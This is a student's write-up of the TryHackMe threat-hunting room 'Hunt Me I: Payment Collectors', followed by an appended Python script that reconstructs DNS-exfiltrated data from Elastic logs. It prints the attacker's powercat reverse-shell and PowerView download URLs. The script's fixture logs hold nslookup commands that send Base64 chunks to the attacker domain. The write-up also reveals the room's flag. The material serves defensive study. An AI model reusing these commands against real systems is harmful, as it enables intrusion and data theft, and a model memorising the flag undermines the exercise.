Hunt Me I: Payment Collectors — Write-up
This exercise, https://tryhackme.com/room/paymentcollectors, is my second activity on TryHackMe, the first being “Become a Hacker.” Sincere thanks to my professor, Sazzad Hossain, for introducing me to such intellectually stimulating and fun exercises on TryHackMe. Now, let us get started on the task at hand.
After opening https://tryhackme.com/room/paymentcollectors, I logged into the Elastic login page using elastic as both the username and the password. Now it was time to find the name of the ZIP attachment that Michael downloaded. To do this, I organised the search parameters to include file.extension, user.name, and file.name. These parameters were chosen because the downloaded file is in .zip format, the user involved is named Michael, and the file.name field makes the exact file in question easier to trace. After a closer examination of the log data, narrowed to a specific date range, voilà! The name popped up as Invoice_AT_2023-227.zip, as evidenced in the highlighted portion of the screen capture below.
Continuing, it was time to look for the file that Michael extracted from the attachment. To do this, I again queried Invoice_AT_2023-227.zip and added a new column titled file.path. The result returned Payment_Invoice.pdf.lnk.lnk as the extracted file I was looking for, as can be seen in the screenshot below:
In answering the question, “What was the name of the command-line process that spawned from the extracted file attachment?”, I did some Google searches first, to help me understand the question, and second, to work out what needed to be done. My search came back with several options, from which I decided to add two new columns, process.command_line and process.name. Hooray! The process was returned as powershell.exe, as depicted in the screen capture below:
Furthermore, to find out “what URL the attacker used to download a tool to establish a reverse shell connection” (that is, to gain remote command-line access to the machine and control it from afar), I simply expanded the process.command_line cell so that I could read the full contents of the field. Once this was done, the answer was right there: https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1, the precise URL that the attacker used within the command-line arguments.
To unravel the port that the workstation connected to on the attacker's machine, the result of the step we just concluded was examined closely, and the port was found to be 19282. This is highlighted in the screen capture given below:
Next, to find the solution to the question, “What was the first native Windows binary the attacker ran for system enumeration after obtaining remote access?”, the search criteria ‘winlog.event_id:1’ together with ‘exe’ were applied: first to filter the logs to Sysmon event ID 1 (process creation), and then to isolate every record that also mentions ‘exe’ in the process details. Eventually, the executable was identified as “systeminfo.exe”, as shown in the screen capture below:
The URL is https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1, as can be seen in the highlighted portion of the screen capture below:
To find the name of the file share that the attacker mapped to Michael’s workstation, we included the “use” command in our search parameters, and the name of the share was returned as SSF-FinancialRecords, as shown in the screenshot below.
NB: The “net use” command is typically used for mapping network drives.
To answer the question, “What directory did the attacker copy the contents of the file share to?”: the data was transferred into the directory C:\Users\michael.ascot\downloads\exfiltration using the Robocopy.exe application, as can be seen below:
With regard to the name of the Excel file the attacker extracted from the file share, it is an Excel document titled ClientPortfolioSummary.xlsx, located within the exfiltration folder.
Finding the name of the archive file that the attacker created in preparation for exfiltration was quite easy. Retrieving the file was straightforward once it was known that the destination folder for the copied contents was labelled “exfiltration.” In our case, the file is exfilt8me.zip.
To ascertain the MITRE ID of the technique that the attacker used to exfiltrate the data, the filter winlog.event_id: (1 OR 3) was applied in order to include Sysmon event IDs 1 (process creation) and 3 (network connection). A closer examination of the network behaviour showed that commands such as whoami, net, and in particular nslookup were used, which points to data leaving over DNS.
The MITRE ID is T1048 (Exfiltration Over Alternative Protocol).
The domain of the attacker’s server that received the exfiltrated data is haz4rdw4re.io, as depicted in the screen capture below:
On the question, “The attacker exfiltrated an additional file from the victim’s workstation. What is the flag you receive after reconstructing the file?”, the following was done:
a) The nslookup queries were pinpointed among a multitude of log entries.
b) The dispatched data segments were scrutinised.
c) A review of the process.command_line data revealed that the segments were Base64-encoded.
d) To analyse the latest batch of segments that were transmitted, CyberChef was used as the decoding tool.
e) With that, the focus narrowed to two distinct data fragments, namely RmYjEyNGZiMTY1NjZlfQ== and VEhNezE0OTczMjFmNGY2ZjA1OWE1Mm.
After isolating the above two segments, CyberChef was used to decode them, giving the flag THM{1497321f4f6f059a52dfb124fb16566e}.
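The reconstruction in steps a) to e) can also be scripted instead of done by hand in CyberChef. The example below is added here and is not part of the write-up or the room: it reads constructed Sysmon-style records, keeps only nslookup lookups aimed at the attacker domain from the write-up, orders the subdomain labels by timestamp, repairs any missing Base64 padding and decodes the joined payload (the sample logs, the benign corp.local lookup and the encoded text are all made up for this example).

```python
import base64
import binascii
import re

# Attacker-controlled domain named in the write-up; every record below is
# constructed for this example and is not taken from the room's Elastic data.
EXFIL_DOMAIN = "haz4rdw4re.io"

# Constructed Sysmon-style records (event ID 1 = process creation). The payload
# is a made-up string split across nslookup subdomain labels; one record is a
# benign lookup and the records are deliberately out of chronological order.
SAMPLE_LOGS = [
    {"@timestamp": "2023-08-15T10:02:05Z", "winlog.event_id": 1,
     "process.command_line": "nslookup U0FNUExF.haz4rdw4re.io"},
    {"@timestamp": "2023-08-15T10:02:03Z", "winlog.event_id": 1,
     "process.command_line": "nslookup RVhGSUwt.haz4rdw4re.io"},
    {"@timestamp": "2023-08-15T10:02:04Z", "winlog.event_id": 1,
     "process.command_line": "nslookup dc01.corp.local"},
    {"@timestamp": "2023-08-15T10:01:59Z", "winlog.event_id": 3,
     "process.command_line": "powershell.exe -nop -w hidden"},
    {"@timestamp": "2023-08-15T10:02:07Z", "winlog.event_id": 1,
     "process.command_line": "nslookup IQ==.haz4rdw4re.io"},
]

# Match "nslookup [flags] <label>.<exfil domain>" and capture the data label.
LABEL_RE = re.compile(
    r"nslookup(?:\.exe)?\s+(?:-[\w=]+\s+)*([A-Za-z0-9+/=]+)\."
    + re.escape(EXFIL_DOMAIN), re.IGNORECASE)


def extract_chunks(logs):
    """Return the Base64 labels sent to the attacker domain in send order."""
    hits = []
    for rec in logs:
        if rec.get("winlog.event_id") != 1:
            continue  # only process-creation events carry the command line
        m = LABEL_RE.search(rec.get("process.command_line", ""))
        if m:
            hits.append((rec["@timestamp"], m.group(1)))
    hits.sort()  # ISO-8601 timestamps sort correctly as plain strings
    return [label for _, label in hits]


def reconstruct(chunks):
    """Join the chunks, repair Base64 padding, and decode the exfiltrated bytes."""
    joined = "".join(chunks).rstrip("=")
    joined += "=" * (-len(joined) % 4)
    try:
        return base64.b64decode(joined, validate=True)
    except binascii.Error as exc:
        raise ValueError(f"chunks do not form valid Base64: {exc}") from exc


if __name__ == "__main__":
    found = extract_chunks(SAMPLE_LOGS)
    print("chunks in send order:", found)
    print("reconstructed:", reconstruct(found).decode())
```

Against real Elastic data the same two functions apply to the hits of the winlog.event_id: 1 query, with the timestamp providing the chunk order that the screenshots show only implicitly.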